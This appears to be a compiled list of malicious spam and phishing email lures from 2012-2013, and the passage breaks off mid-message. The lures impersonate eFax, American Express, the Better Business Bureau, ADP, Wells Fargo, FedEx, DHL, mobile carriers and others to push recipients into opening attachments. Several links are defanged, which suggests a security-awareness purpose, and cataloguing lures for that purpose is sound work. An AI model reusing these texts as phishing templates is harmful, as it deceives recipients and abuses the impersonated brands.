Body: \n \n**eFax Corporate \nYou have received a 17 page(s) fax at 2012-12-04 02:21:23 CST. \n* The reference number for this fax is latf1_did11-1712454872-3369585553-07. \nPlease visit www.efaxcorporate.com/corp/twa/page/customerSupport if you have any questions regarding this message or your service. You may also e-mail our corporate support department at corporatesupport@mail.efax.com. \nThank you for using the eFax Corporate service! \nPowered by j2 \nj2 Global | eFax | eVoice | FuseMail | Campaigner | KeepItSafe | OneBox \n2012 j2 Global, Inc. All rights reserved. \neFax Corporate is a registered trademark of j2 Global, Inc.**\n\nOr \n\n> Subject: **Corporate eFax message from \"846-578-7579\" - 21 page(s)** \n \nMessage Body: \n \n**eFax Corporate \nYou have received a 21 page(s) fax at 2012-12-04 01:51:35 CST. \n* The reference number for this fax is latf1_did11-1660568147-9888714287-91. \nPlease visit www.efaxcorporate.com/corp/twa/page/customerSupport if you have any questions regarding this message or your service. You may also e-mail our corporate support department at corporatesupport@mail.efax.com. \nThank you for using the eFax Corporate service! \nPowered by j2 \nj2 Global | eFax | eVoice | FuseMail | Campaigner | KeepItSafe | OneBox \n2012 j2 Global, Inc. All rights reserved. \neFax Corporate is a registered trademark of j2 Global, Inc. **\n\nOr \n\n> Subject: **Vodafone MMS message** \n \nMessage Body: \n \n**You have received a picture message from mobile number +393469188487 \nTo save this picture, please save attached file. \nTo send a reply containing pictures, audio or video, click here \nAlternatively, you can send a text-only reply (limited to 500 characters) \nCopyright 2012 Vodafone Group**\n\nOr \n\n> Subject: **Confidential - Secure Message from AMEX** \n \nMessage Body: \n \n**Secure Message \nThe security of your personal information is of the utmost importance to American Express, so we have sent the attached as a secure electronic file. \nNote: The attached file contains encrypted data. \nIf you have any questions, please call us at 800-453-6334, option 0. Representatives are available to assist you Monday through Thursday between 8:00 a.m. and 8:00 p.m. ET and Friday between 8:00 a.m. and 6:00 p.m. ET. \nThe information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. \nThank you, \nAmerican Express \n2012 American Express Company. All rights reserved. \n, , , , , , , , , , , , , **\n\nOr \n\n> Subject: **Encrypted Message from AMEX** \n \nMessage Body: \n \n**Secure Message \nThe security of your personal information is of the utmost importance to American Express, so we have sent the attached as a secure electronic file. \nNote: The attached file contains encrypted data. \nIf you have any questions, please call us at 800-327-7841, option 1. Representatives are available to assist you Monday through Thursday between 8:00 a.m. and 8:00 p.m. ET and Friday between 8:00 a.m. and 6:00 p.m. ET. \nThe information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. \nThank you, \nAmerican Express \n2012 American Express Company. All rights reserved.**\n\nOr \n\n> Subject: **SBQ Form #267014371(Ref#593420738-4301)** \n \nMessage Body: \n \n**Thank you for supporting your Better Business Bureau (BBB). \nAs a service to BBB Accredited Businesses, we try to ensure that the information we provide to potential customers is as accurate as possible. In order for us to provide the correct information to the public, we ask that you review the information that we have on file for your company. \nWe encourage you to print this SBQ Form, answer the questions and respond to us. (self-extracting archive, Adobe PDF) \nPlease look carefully at your telephone and fax numbers on this sheet, and let us know any and all numbers used for your business (including 800, 900, rollover, and remote call forwarding). Our automated system is driven by telephone/fax numbers, so having accurate information is critical for consumers to find information about your business easily. \nThank you again for your support, and we look forward to receiving this updated information. \nSincerely, \nAccreditation Services **\n\nOr \n\n> Subject: **FW: Case #BXX7U55DUY** \n \nMessage Body: \n \n**Case #BXX7U55DUY \nThe Better Business Bureau has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer's concern are included on the reverse. Please review this matter and advise us of your position. \nAs a neutral third party, the Better Business Bureau can help to resolve the matter. Often complaints are a result of misunderstandings a company wants to know about and correct. \nIn the interest of time and good customer relations, please provide the BBB with written verification of your position in this matter by December 12, 2012. Your prompt response will allow BBB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter. \nThe Better Business Bureau develops and maintains Reliability Reports on companies across the United States and Canada . This information is available to the public and is frequently used by potential customers. Your cooperation in responding to this complaint becomes a permanent part of your file with the Better Business Bureau. Failure to promptly give attention to this matter may be reflected in the report we give to consumers about your company. \nWe encourage you to print this complaint (attached file), answer the questions and respond to us. \nWe look forward to your prompt attention to this matter. \nSincerely, \nBBB Serving Metropolitan New York, Long Island and the Mid-Hudson Region**\n\nOr \n\n> Subject: **BBB Re: Case #28162504** \n \nMessage Body: \n \n**RE: Case #28162504 \nHello, \nThe Better Business Bureau has received the above mentioned complaint from \none of your clients on the subject of their business relations with you. The \ndetailed information about the consumer's concern is explained in attached \ndocument. Please give attention to this problem and inform us about your \nposition as soon as possible. We kindly ask you to open the COMPLAINT REPORT \nto respond on this complaint. \nATTACHED REPORT: BBB.COMPLAINT28162504.zip \nWe are looking forward to your urgent reply. \nFaithfully yours, \nRutendo Gorner \nDispute Counselor \nBetter Business Bureau \nBetter Business Bureau \n3033 Wilson Blvd, Suite 600 Arlington, VA 22201 \nPhone: 1 (703) 276.0100 Fax: 1 (703) 525.8277 \nThis message was sent to bigrel@idsi.net.**\n\nOr \n\n> Subject: **Internet Explorer 9 Browser Settings for ANZ Internet Banking** \n \nMessage Body: \n \n**Thank you for your recent enquiry regarding accessing ANZ Internet Banking. \nAs per your request, please find attached instructions for configuring Internet Explorer 9 for use with Internet Banking. \nBy following the steps outlined in the attached document at your ownpace, \nyou should be able to gain access to your Internet Banking service. \nPlease note that the attached document is an Adobe Acrobat file (PDF). \nIf you are unable to view this document, you can download Adobe AcrobatReader free of charge. \nJust copy and paste the following website addressinto your browser address bar. \nhxxp://www.adobe.com/products/acrobat/readstep2.html **\n\nOr \n\n> Message Body: \n \n**Degerli M\u00fcsterimiz, \nFirmaniz Yal\u00e7in Kardesler Hali Tek.San.Ve Tic.Ltd e ait 25.12.2012 tarihinde basilan fatura bilgileriniz ekte dikkatinize sunulmustur. Toplam fatura tutari 1.483,62 TL olup son \u00f6deme tarihi 01.01.2013 dir. \nDetaylar ekli dosya bulunmaktadir. \n\u00d6demelerinizi anlasmali oldugumuz banka subelerinden yapabilir, yeni fatura \u00f6demeleriniz i\u00e7in otomatik \u00f6deme talimati verebilirsiniz. \nBir sonraki ay hesap kesim tarihiniz 01.01.2013 olup son \u00f6deme tarihiniz 13.01.2013 dir. \nSaygilarimizla \nTurkcell Iletisim Hizmetleri A.S. \nBu mesaj bilgilendirme amaciyla g\u00f6nderilmistir. \nFaturalariniz ile ilgili soru ve g\u00f6r\u00fcsleriniz i\u00e7in, 444 0 532 Turkcell M\u00fcsteri Hizmetleri'ni arayabilirsiniz.**\n\nOr \n\n> Message Body: \n \n**Description: T-Mobile ICO \nFrom telephone number +447827718041 \nPassword CYN1D58O \nIf your can't show pictures click here to visit our on-line a web address - www.t-mobile.co.uk/pmcollect - where you can look at the picture message (enter your telephone number and the password). \nIt'll only be available online for 14 days, so make sure you save the picture to a computer if you want to keep it. **\n\nOr \n\n> Subject: **Interfax(tm) 1-sayfa faks** \n \nMessage Body: \n \n**Interfax Servisi. \nAlinan faks 16/01/2013 08:40:59 tarihinde (yerel saat) +90 (224) 789-1566 numaraya tarafindan gonderilmistir ve 1 sayfadir. \n\u2013 \nL\u00fctfen bu mesaja YANIT VERMEYINIZ, alicisina ulasmayacaktir ! \u2013 **\n\nOr \n\n> Subject: **PO040213_ RETECTL _ORDER.** \n \nMessage Body: \n \n**Dear Friend, \nFollowing my Boss previous mails to you, I have been asked to send an official Order asap \nPlease kindly send us a Proforma Invoice sealed with your company stamp and signature \nPlease Find attached Purchased Order. \nKindly quote our reference number in all correspondences. \nPlease revert to us if you have any clarifications. Kindly consider this \nUrgent \nGood day to you \nThanks & Regards \nWarwick Banks( Mr) \nPURCHASING GROUP HEAD \nPan Europe Industrial Equipments LLC, \nNo 101, Ist Floor, Sheikh Salem Al Quasimi Building, \nAl Quasimi Area, P.O. Box No 66209, \nSharjah - United Arab Emirates. **\n\nOr \n\n> Subject: **Fwd: Vodafone MMS, Wed, 6 Feb 2013 10:45:00 +0200** \n \nMessage Body: \n \n**Description: Description: Vodafone e-mail servis saglayicilarinin MMS protokollerine uyumlu olmasi \u00f6nemlidir \nTelefon Numarasi +905493985199 \nVodafone MMS, Vodafone'un MMS (Multimedia Messaging Service), yani g\u00f6r\u00fcnt\u00fcl\u00fc mesaj servisidir. MMS uyumlu cep telefonunuzdan, Vodafone, Turkcell veya Avea hatli ve MMS uyumlu bir baska cep telefonuna g\u00f6r\u00fcnt\u00fcl\u00fc ve sesli mesaj g\u00f6ndermenizi, almanizi saglar. \nOnline Self Servis'e Giris \nCopyright 2012 Vodafone Group **\n\nOr \n\n> Subject: **MMS Nachricht** \n \nMessage Body: \n \n**Description: T-Mobile \nTelefonnummer +491705525624**\n\nOr \n\n> Subject: **T-Mobile MMS message** \n \nMessage Body: \n \n**Description: T-Mobile ICO \nFrom telephone number +447920201344 \nPassword 7MXR26A7 \nIf your can't show pictures click here to visit our on-line a web address - www.t-mobile.co.uk/pmcollect - where you can look at the picture message (enter your telephone number and the password). \nIt'll only be available online for 14 days, so make sure you save the picture to a computer if you want to keep it. **\n\nOr \n\n> Subject: **FedMail (R): FEDACH Notification - End of Day - 03/4/13** \n \nMessage Body: \n \n**Please overview attached ACH Advice Summary from the Federal Reserve System **\n\nOr \n\n> Subject: **Automated Payroll Invoice Notification** \n \nMessage Body: \n \n**ADP TotalSource \nA copy of your ADP TotalSource Payroll Invoice for the following payroll is is attached in PDF file and available for viewing. \nYear: 13 \nWeek No: 08 \nPayroll No: 1 \nPlease open attached file to view and check following payrol \nThis email was generated by an automated notification system. If you have any questions regarding the invoice or you have misplaced your \nMyTotalSource login information, please contact your Payroll Service Representative. Please do not reply to the email directly. \n\u00a9 2007 Automatic Data Processing, Inc. **\n\nOr \n\n> Subject: **Comcast Invoice Application** \n \nMessage Body: \n \n**Good Morning! \nI`m attaching our invoicing document that does requires your signature. \nI`ve filled out all of the required information, I just need your signature. \nPlease only fill out the bottom portion regarding your signature. (see below screenshot) Your banking information is not required. \nOnce completed, you can fax that directly to our Business Operations Unit on their secure fax line. 610-514-9883. Upon receipt, I can process your order. \nNorm Jones \nMarketing Consultant \nDescription: Description: http://www.cs-dev.dreamhosters.com/email_marketing_support_files/cs_newsfrommarketing/images/Comcast_Spotlight_Signatures.png \nSuite 300 \n1500 Sycamore Road \nMontoursville, PA 17754 \nCell: 570-651-2793 \nOffice: 570-244-4473 \nFax: 570-651-9113 \nNorman_Jones@cable.comcast.com \nThis e-mail contains an advertisement or solicitation. \nIf you would rather not receive future e-mails from \nComcast Spotlight, you may unsubscribe here.**\n\nOr \n\n> Subject: **Your ADP Payroll invoice for last week** \n \nMessage Body: \n \n**Your ADP Payroll invoice for last week is attached for your review. \nIf you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance. \nThank you for choosing ADP Payroll. \nImportant: Please do not respond to this message. It comes from an unattended mailbox. **\n\nOr \n\n> Subject: **Fwd: Better Business Bureau Complaint** \n \nMessage Body: \n \n**Good afternoon, \nHere with the Better Business Bureau would like to inform you that we have received a complaint (ID 504825797) \nfrom a customer of yours in regard to their dealership with you. \nPlease open the COMPLAINT REPORT attached to this email (Acrobat Reader file) \nto view the details on this issue and suggest us about your position as soon as possible. \nWe hope to hear from you shortly. \nRegards, \nLitzy Abraham \nDispute Counselor \nBetter Business Bureau **\n\nOr \n\n> Subject: **TNT Express factuur 425494072; Klantnummer 542362391** \n \nMessage Body: \n \n**Geachte heer, mevrouw, \nEr zijn nieuwe facturen en/of creditnota's van TNT Express Nederland beschikbaar. In de bijlage vindt U uw originele factuur. \nU kunt kopie\u00c3\u00abn van deze documenten en hun csv-bestanden bekijken en downloaden via onderstaande link. \nhttp: //express.tnt.com/einvoicing \nMet vriendelijke groet, \nBilling Department, The Netherlands \nFinance & Administration, TNT Express Benelux \nEmail: nl.e-invoicing@tntexpress.nl**\n\nOr \n\n> Subject: **Your Virgin Blue Itinerary** \n \nMessage Body: \n \n**Travel Detail= s - Itinerary Is Attached \nHi, \nThank you for choosing to travel with Virgin Blue. \nYour reservation numb= er is A9XUHP. \nVirgin Blue is a ticketless a= irline, therefore you don't need a ticket to travel with us. All you = need to do is present photo ID and the attached itinerary. It's that easy= ! \nImportant Flight Info= rmation \nYou must arrive at th= e airport and check-in at least 30 minutes prior to your scheduled depart= ure time. \nFailure to arrive by this time may cause you to miss yo= ur flight and forfeit the fare paid. \nWhen travelling on a Blue Sav= er or GO! Fare you can choose to travel with carry-on baggage only, or take checked baggage for j= ust a little more. If you haven't already purchased your baggage allowanc= e pre-pay online before you fly for onl= y $8 for up to 23kgs to save (it costs $20 at the airport). Purchase onli= ne at Manage Bookings or visit www.virg= inblue.com.au/baggage for more information about our new bag= gage policy. \nItinerary Viewing \nYour itinerary is in = PDF format and is attached to this email. You w= ill need Adobe Acrobat to view this itinerary - download a copy free from= the Adobe websit= e. You can also request a plain text version of the itinerary. \nTravel Extras \n= Local Weather Forecast =BB \nCheck your local and destination weather f= orecast before you go. \nEuropcar =BB \nExclusive car hire rates from Europcar for= all Virgin Blue Guests. \nHotels =BB \nWide range of accommodation options that s= uits your needs at home or worldwide. \nAirport Parking =BB \nSave money in Australia and NZ by pre-book= ing at exclusive Guest rates. \nGoDo Tours and Activities =BB<= /a> \nOver 1,700 Tours and Activities from GoDo = for when at home or away! \n= \nThe Lounge \nThe Lounge is your airport oasis to do business, enjoy a premium re= freshment, or just sit back and relax. Save $5 by pre-purchasin= g your single entry visit now for $30 AUD (inc. GST) per person= . Single Entry is also available for purch= ase at The Lounge Reception on the day of travel for $35 per person (inc.= GST). For more information on = Annual Membership to The Lounge please visit The Lounge website. \nThe Lounge is located in the domestic terminals at Brisbane, Sydne= y, Melbourne, Adelaide and Canberra airports. \n3D\"The \n= \nVelocity \nVelocity members earn Velocity points for every dollar spent on the= ir Virgin Blue fare! \nOur award-winning loyalty program is free to join online. \n3D\"Join \n= \n= \n3D\"Travel 3D\"The= \nRemember to save time and $30= on every return return trip by booking online at www.virginblue.com.au.<= br /> \nFor all enquiries, please vis= it our website or call our award-winning Guest Cont= act Centre on 13 6789. Guests calling from outside of Australia please ca= ll +61 7 3295 2296. \nTravel on Virgin Blue is subj= ect to our Conditions of Carriage and dangerous goods restrictions, as ou= tlined in the attachments to this email. \n3D\"V= \nEnjoy your flight!... from The Virgin B= lue Crew**\n\nOr \n\n> Subject: **Fwd: Cover-More Travel Insurance Cover (policy number: 62178386)** \n \nMessage Body: \n \n**\\----- Forwarded Message -----From: yourtravelinsurance-noreply@covermore.com.au To: magt@westnet.com.au Sent: Tuesday, 16 April, 2013 8:33:15 AM GMT +08:00 Beijing / Chongqing / Hong Kong / Urumqi Subject: Cover-More Travel Insurance Cover (policy number: 62178386) \nThank you for choosing to travel with Cover-More Travel Insurance. \nYou have chosen to purchase a policy with Australia's most popular travel insurance provider, trusted by over 1,000,000 Australian travellers each year. \nAttached is a copy of your Certificate of Insurance along with a copy of the Product Disclosure Statement (PDS), which we encourage you to read. \nRemember to keep your emergency assistance card with you when travelling and our 24 emergency assistance team are here to help you. \nWe hope you have a safe and enjoyable journey, \nCover-More Travel Insurance Team \nP 1300 72 88 22 | E enquiries@covermore.com.au A Private Bag 913 North Sydney NSW 2059 www.covermore.com.au **\n\nOr \n\n> Subject: **RE: Reconfirm bank Invoice** \n \nMessage Body: \n \n**Dear Sir, \nConcerning the invoice, Our bank has rejected our T/R this morning. \nPlease confirm if your Beneficiary in the bank attachment is correct \nand kindly \nrevert to me! \nAwaiting your urgent reply \nTHANKS & REGARDS \nSatish. N \nGanesh Exime \n4kms Bangalore Road \nChallakere 577522 \nChitradurga Dist. \nKarnataka State, INDIA \nOff: +91-8195 - 222489 \nFax: +91-08195 - 222859 \nMobile: +91-98453-8348 **\n\nOr \n\n> Subject: **FedEx Shipment Notification** \n \nMessage Body: \n \n**________________________________________________________________________________ \nThis tracking update has been requested and attached to this email \n________________________________________________________________________________ \nReference information includes: Invoice number, Reference, Special handling/Services, Residential Delivery. Reference information is attached to this email. \nTracking number: 446967508433 \nTo track the latest status of your shipment, click on the tracking number above, or visit us at fedex.com. \nTo learn more about FedEx Express, please visit our website at fedex.com. \nThis tracking update has been sent to you by FedEx on the behalf of the Requestor noted above. FedEx does not validate the authenticity of the requestor and does not validate, guarantee or warrant the authenticity of the request, the requestor's message, or the accuracy of this tracking update. For tracking results and fedex.com's terms of use, go to fedex.com. \nThank you for your business.**\n\nOr \n\n> Subject: **Give you a nice surprise!!!** \n \nMessage Body: \n \n**Give you a nice surprise!!! **\n\nOr \n\n> Subject: **International Wire Transfer File Not Processed** \n \nMessage Body: \n \n**We are unable to process your International Wire Transfer request due to insufficient funds in the identified account. \nReview the information below and contact your Relationship Manager if you have questions, or make immediate arrangements to fund the account. If funds are not received by 04/12/2013 03:00 pm PT, the file may not be processed. \nPlease view the attached file for more details on this transaction. \nAny email address changes specific to the Wire Transfer Service should be directed to Treasury Management Client Services at 1-800-AT-WELLS (1-800-289-3557). \nEvent Message ID: S941-6828257 Date/Time Stamp: Fri, 12 Apr 2013 19:16:42 +0330 \n\\--------------------------------------------------------------------------- ------------------------------------------------------------------------- \nPlease do not reply to this email; this mailbox is only for delivery of Event Messaging notices. To ensure you receive these notices, add ofsrep.ceoemigw@wellsfargo.com to your address book. \nFor issues related to the receipt of this message, call toll free 1-800-AT-WELLS (1-800-289-3557) Monday through Friday between 4:00 am and 7:00 pm and Saturday between 6:00 am and 4:00 pm Pacific Time. \nCustomers outside the U.S. and Canada may contact their local representative's office, or place a collect call to Treasury Management Client Services at 1-704-547-0145. \nPlease have the Event Message ID available when you call. **\n\nOr \n\n> Subject: **PD: Odp: Przedsadowe wezwanie do zaplaty** \n \nMessage Body: \n \n**Dnia 3-06-2013 o godz. 16:15 napisal(a): \n> szanowny panie, \n> \n> z radoscia zaplace wymieniona kwote pod warunkiem ze przesle mi pan \n> informacje kto, kiedy i co kupil oraz wysle mi pan potwierdzony dow\u00f3d \n> zakupu oraz fakture zamiast tego smiecia z zalacznika. \n> \n> \n> \n> Dnia 3-06-2013 o godz. 15:34 Stanislaw Kozlowski napisal(a): \n> > Szanowni Panstwo, \n> > zgodnie z zaakceptowanymi przez Panstwo warunkami umowy dotyczacej \n> > naszych uslug zobowiazali sie Panstwo do oplacenia zam\u00f3wionej \n> > uslugi w terminie 7 dni od dnia zawarcia umowy. Z uwagi na to, ze \n> > dotychczas nie odnotowalismy wplaty, doreczamy niniejsze wezwanie do \n> > zaplaty. \n> > \n> > Jednoczesnie informujemy, iz dalszy brak zaplaty za zam\u00f3wiona \n> > usluge spowoduje konsekwencje prawne co wiaze sie z dodatkowymi \n> > kosztami. W stosunku do os\u00f3b uchylajacych sie od zaplaty mozliwe \n> > jest przekazanie sprawy zewnetrznej firmie prawno-windykacyjnej lub \n> > natychmiastowe postepowanie sadowe i egzekucja komornicza naleznosci. \n> > \n> > Niniejszym prosimy o dobrowolne uregulowanie naleznosci w kwocie \n> > 2.660,00 zl w nieprzekraczalnym terminie 5 dni od momentu otrzymania \n> > niniejszej wiadomosci. W zalaczniku przesylam zalegla fakture VAT. \n> > \n> > \\-- \n> > Stanislaw Kozlowski \n> > st.specjalista ds. windykacji klienta biznesowego \n> > \n> > Microsoft Sp. z o.o. \n> > Departament Windykacji \n> > Al. Jerozolimskie 195a \n> > 02-222 Warszawa \n> > Poland \n> > \n> > www.microsoft.com \nWOKA - HTM \nPawel Salski \nsale@wp.pl \nhxxp: //www.woka.info \ntel. kom. +48605205585 **\n\nOr \n\n> Subject: **Ihre O2 DSL Bestellung (Kundennummer DE82739286)** \n \nMessage Body: \n \n**Lieber O2 Kunde, \nInformationen zu Ihrem Auftrag finden Sie im Anhang an diese E-Mail als pdf-Datei. Diese k\u00f6nnen Sie mit einem \nDoppelklick ganz einfach \u00f6ffnen. \nHinweise zum pdf-Format: Zum Lesen, Drucken und/oder Speichern von PDF-Dateien ben\u00f6tigen Sie das \nProgramm Acrobat Reader von Adobe. Haben Sie den Acrobat Reader noch nicht auf Ihrem Computer installiert, \nk\u00f6nnen Sie ihn hier kostenlos herunterladen: http://www.adobe.de/products/acrobat/readstep2.html \nUnser pers\u00f6nlicher Tip f\u00fcr Sie: M\u00f6chten Sie die Datei auf Ihrem Rechner abspeichern? Verwenden Sie einfach die \nrechte Maustaste und klicken Ziel speichern unter an. Anschlie\u00dfend w\u00e4hlen Sie das Verzeichnis auf Ihrem Rechner \naus, in dem die Datei abgespeichert werden soll. \nFreundliche Gr\u00fc\u00dfe \nIhr O2 Team **\n\nOr \n\n> Subject: **International Wire Transfer File Not Processed** \n \nMessage Body: \n \n**We are unable to process your International Wire Transfer request due to insufficient funds in the identified account. \nReview the information below and contact your Relationship Manager if you have questions, or make immediate arrangements to fund the account. If funds are not received by 04/12/2013 03:00 pm PT, the file may not be processed. \nPlease view the attached file for more details on this transaction. \nAny email address changes specific to the Wire Transfer Service should be directed to Treasury Management Client Services at 1-800-AT-WELLS (1-800-289-3557). \nEvent Message ID: S941-6828257 Date/Time Stamp: Fri, 12 Apr 2013 19:16:42 +0330 \n\\--------------------------------------------------------------------------- ------------------------------------------------------------------------- \nPlease do not reply to this email; this mailbox is only for delivery of Event Messaging notices. To ensure you receive these notices, add ofsrep.ceoemigw@wellsfargo.com to your address book. \nFor issues related to the receipt of this message, call toll free 1-800-AT-WELLS (1-800-289-3557) Monday through Friday between 4:00 am and 7:00 pm and Saturday between 6:00 am and 4:00 pm Pacific Time. \nCustomers outside the U.S. and Canada may contact their local representative's office, or place a collect call to Treasury Management Client Services at 1-704-547-0145. \nPlease have the Event Message ID available when you call.**\n\nOr \n\n> Subject: **Unsuccessful fax transmission to 17857704433** \n \nMessage Body: \n \n**The fax you recently sent through eFax did not go through because your email address is not registered for this service. \nPlease refer to attached file for full available details. \nIf your service includes the ability to send faxes, please log in by clicking here to register additional email addresses with your eFax account. \n(c) 2013 j2 Global Communications, Inc. All rights reserved. \neFax (r), eReceptionist (r), Campaigner (r), FuseMail (r), KeepItSafe (r) and Onebox(r) are registered trademarks of j2 Global Communications, Inc. and its affiliates.**\n\nOr \n\n> Message Body:** \n \n********************************************************* \nINCOMING FAX REPORT \n********************************************************* \nDate/Time: Mon, 10 Jun 2013 05:38:34 -0900 \nSpeed: 57494 bps \nConnection time: 03:01 \nPages: 3 \nResolution: Normal \nRemote ID: 347-955-5626 \nLine number: 347-215-5623 \nDTMF/DID: Description: Confidential - To All Employees .pdf \n********************************************************* \nCONFIDENTIALITY NOTICE: \nThis electronic mail transmission and any attached files contain \ninformation intended for the exclusive use of the individual or entity to \nwhom it is addressed and may contain information belonging to the sender \nthat is proprietary, privileged, confidential and/or protected from \ndisclosure under applicable law. If you are not the intended recipient, you \nare hereby notified that any viewing, copying, disclosure or distributions \nof this electronic message are violations of federal law. Please notify the \nsender of any unintended recipients and delete the original message without \nmaking any copies. Thank You \n\\------------------------------------------------------------------------ \nOriginal craigslist post: \nhxxp: //atlanta.craigslist.org/atl/pet/3720473730.html \nAbout craigslist mail: \nhxxp: //craigslist.org/about/help/email-relay \nPlease flag unwanted messages (spam, scam, other): \nhxxp: //craigslist.org/mf/84eed392cfe896c2bb294a5c950cca78d92e080c.1 \n\\------------------------------------------------------------------------ **\n\nOr \n\n> Subject: **IMPORTANT - WellsFargo** \n \nMessage Body: \n \n**Please check attached documents. \nBrenton_Mays \nWells Fargo Advisors \n817-563-5501 office \n817-368-1981 cell \nBrenton_Mays@wellsfargo.com \nATTENTION: THIS E-MAIL MAY BE AN ADVERTISEMENT OR SOLICITATION FOR PRODUCTS AND SERVICES. \nTo unsubscribe from marketing e-mails from: \n\u00b7 An individual Wells Fargo Advisors financial advisor: Reply to one of his/her e-mails and type \u201cUnsubscribe\u201d in the subject line. \n\u00b7 Wells Fargo and its affiliates: Unsubscribe at www.wellsfargoadvisors.com/unsubscribe. \nNeither of these actions will affect delivery of important service messages regarding your accounts that we may need to send you or preferences you may have previously set for other e-mail services. \nFor additional information regarding our electronic communication policies, visit http://wellsfargoadvisors.com/disclosures/email-disclosure.html . \nInvestments in securities and insurance products are: \nNOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE \nWells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 \nCONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed. If you are not the intended recipient of this message, please be advised that any dissemination, distribution, or use of the contents of this message is strictly prohibited. If you received this message in error, please notify the sender. Please also permanently delete all copies of the original message and any attached documentation. Thank you.**\n\nOr \n\n> Subject: **(SECURE)Electronic Account Statement 0977520259_06102013** \n \nMessage Body: \n \n**^ You have received a Secure PDF message from the RBS Bankline Secure Messaging Server. \nOpen the PDF file attached to this notification. When prompted, enter your Secure PDF password to view the message contents. \nTo reply to this message in a secure manner, it is important that you use the Reply link inside the Secure PDF file. This will ensure that any confidential information is sent back securely to the sender. \nHelp is available 24 hours a day by email at secure.emailhelp@rbs.com \nPlease note: Adobe Reader version 7 or above is required to view all SecurePDF messages.**\n\nOr \n\n> Message Body: \n \n**Hello \nHow are you doing?could you quote for the attached detailed items with specifications.Kindly send your quote as soon as possible along with your detail of orderThanks \nBest Regards,Ceklik Co.LtdInkilap Mahallesi Site Yolu Naya Sokak No:11/1-5 \u00dcmraniye/ISTANBUL/TURKEYPhone :(0216) 634 34 34(0216) 634 34 35 (0216) 634 23 10Fax :(0216) 6314 34 33E-mail:info@goktun.com,sukru@goktun.com,goktun@goktun.com **\n\nOr \n\n> Subject: **Your CTP Green Slip Quote** \n \nMessage Body: \n \n**Hello Dear, \nYour CTP Green Slip Quote is $ 184.00 (Including GST and MCIS Levies). \nYou can find full details in the attached file. \nThank you for choosing us. \nBest Regards, \nEasy Green Slips Support Team \nwww.EasyGreenSlips.com.au \nCaution: This message is intended for the addressee named above. It may contain privileged or confidential information. If you are not the intended recipient of this message you must not use, copy, distribute or disclose it to anyone other than the addressee. If you have received this message in error please return the message to the sender by replying to it and then delete the message from your computer. Internet e-mails are not necessarily secure. Colonial Insurance Pty Ltd do not accept responsibility for changes made to the message after it was sent. Colonial Insurance Pty Ltd will not be liable in connection with any data corruption, interruption, delay, computer virus or unauthorised access or amendment to the contents of this email. \n_____________________________________________ \nment to the contents of this email. **\n\nOr \n\n> Subject: **Uw recentste DHL factuur: 9003228** \n \nMessage Body: \n \n**DIT IS EEN AUTOMATISCH GEGENEREERD BERICHT, GELIEVE DEZE NIET TE BEANTWOORDEN \nGeachte klant, \nHierbij ontvangt u uw recentste DHL factuur in PDF formaat, d.d. 03/06/2013 voor diensten verleend door DHL Express. \nIndien u uw factuur in een ander formaat wilt downloaden, klik hier. Indien u uw accountgegevens of uw online factuurgeschiedenis wilt bekijken , klik hier. \namscadesk@dhl.com or 0800 - 0552 (option 1-1-4) \nIndien u de digitale handtekening van dit document wilt verifi\u00ebren, klik hier en ga naar FAQ (veelgestelde vragen) voor instructies. \nMocht zich een probleem voordoen in het openen van de bijlage, neemt u dan voor assistentie alstublieft contact op met DHL via 0800 023-0278 \n. \nGraag ontvangen wij uw betaling volgens de afgesproken betalingsvoorwaarden zoals op uw factuur staan aangegeven. \nHartelijk dank. \nMet vriendelijke groet, \nHet DHL e-Billing Team \nKlik hier om Adobe Acrobat Reader te downloaden \nBEVEILIG UW WACHTWOORD**\n\nOr \n\n> Subject: **SPAM email** \n \nMessage Body: \n \n**You got a PERSONAL MESSAGE from Ashlyn Kepley: \nI am not looking for a commitment right now. \nI am busy pursuing my goals and dreams and I haven't got time for a long term relationship if you know what I mean... \nIf you don't mind, we could get to know each other a little bit closer... ;) \nWaiting for you with impatience, \nAshlyn hxxp://www.ashlyn-kepley.us/**\n\nOr \n\n> Subject: **{Spam?} Uw Simyo beltegoed is laag** \n \nMessage Body: \n \n**Uw Simyo beltegoed voor telefoonnummer 0610109197 is onder de E 2,- uitgekomen en kan zelfs al onder de E 0,- zijn. Voorkom verrassingen en waardeer snel op via uw persoonlijke omgeving op https://mijn.simyo.nl/. \nContact: hxxp://www.simyo.nl/klantenservice \nMet vriendelijke groet, \nHet Simyo team \nOp dit bericht kunt u niet reageren. \nAls u nog vragen hebt, ga dan naar hxxp://www.simyo.nl/klantenservice/veelgestelde-vragen/prepaid**\n\nOr \n\n> Subject: **Scanned Image from a HP Digital Device** \n \nMessage Body: \n \n**Please open the attached document. This document was digitally sent to you \nusing an HP Digital Sending device. \nTo view this document you need to use the Adobe Acrobat Reader. \n\\--------------------------------------------------------------------------- \nThis email has been scanned for viruses and spam.**\n\nOr \n\n> Subject: **Microsoft HUP Ihre Bestellbestatigungnummer lautet** \n \nMessage Body: \n \n**Microsoft\u00ae HOME USE PROGRAM Best\u00e4tigung \nSehr geehrte(r), \nVielen Dank f\u00fcr Ihre Bestellung. Ihre Bestellbest\u00e4tigungsnummer lautet: 399255366. Ihren Produkt Key zur Aktivierung der Software finden Sie In der befestigten Datei. Bitte bewahren Sie diese Informationen auf. \nBitte installieren Sie diese Software auf Ihren Heim-PC indem Sie diese e-Mail an Ihr pers\u00f6nliches e-Mail-Konto Weiterleiten und anschlie\u00dfend auf Ihrem Heim-PC den Download-Link anklicken. \nWenn Sie keine Sicherungskopie der Software erworben haben, wird empfohlen, eine Kopie der Software auf einem vorhandenen Festplattenlaufwerk oder einer DVD zu erstellen, falls Sie die Software zu einem sp\u00e4teren Zeitpunkt erneut installieren m\u00fcssen. \nWenn Sie eine 